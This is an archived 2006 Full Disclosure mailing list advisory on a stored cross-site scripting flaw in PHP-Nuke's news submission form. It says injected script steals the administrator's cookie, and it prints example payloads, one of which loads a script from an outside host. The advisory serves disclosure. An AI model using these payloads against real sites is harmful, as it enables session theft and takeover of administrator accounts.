Full Disclosure mailing list archives
PHP-NUKE Submit_News Cross-Site Scripting Vulnerability
From: "0o_zeus_o0 security-mx.org" <zeus.olimpusklan () gmail com>
Date: Wed, 1 Mar 2006 18:24:27 -0600
########################################################################### # Advisory #9 Title: PHP-NUKE Submit_News Cross-Site Scripting Vulnerability # # # Author: 0o_zeus_o0 # Contact: zeus () diosdelared com # Website: www.elitemexico.org # Date: 01/03/2006 # Risk: High # Vendor Url: http://www.phpnuke-espanol.org/ # Affected Software: php-nuke # Non Affected: # # We Are: olimpus klan team # #Info: #================================================================ #vulnerability that affects to all the systems phpnuke in Submit_News, bugs consists # #of inserting code xss in the shipment of the news of users this cause # #that when the administrator receives that news robs its cookie, this # #would cause identity robbery # # # #Example XSS: #================================================================ # #<script>alert(document.cookie);</script> # #<SCRIPT SRC=http://elitemexico.org/xss.js></SCRIPT> #================================================================ # #Solution: #================================================================ # #VULNERABLE VERSIONS #================================================================ #all vercion # #================================================================ #Contact information #0o_zeus_o0 #zeus () diosdelared com #www.elitemexico.org #================================================================ #greetz: lady fire,Mi beba, olimpus klan team and elitemexico ##############################################################################
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- PHP-NUKE Submit_News Cross-Site Scripting Vulnerability 0o_zeus_o0 security-mx.org (Mar 01)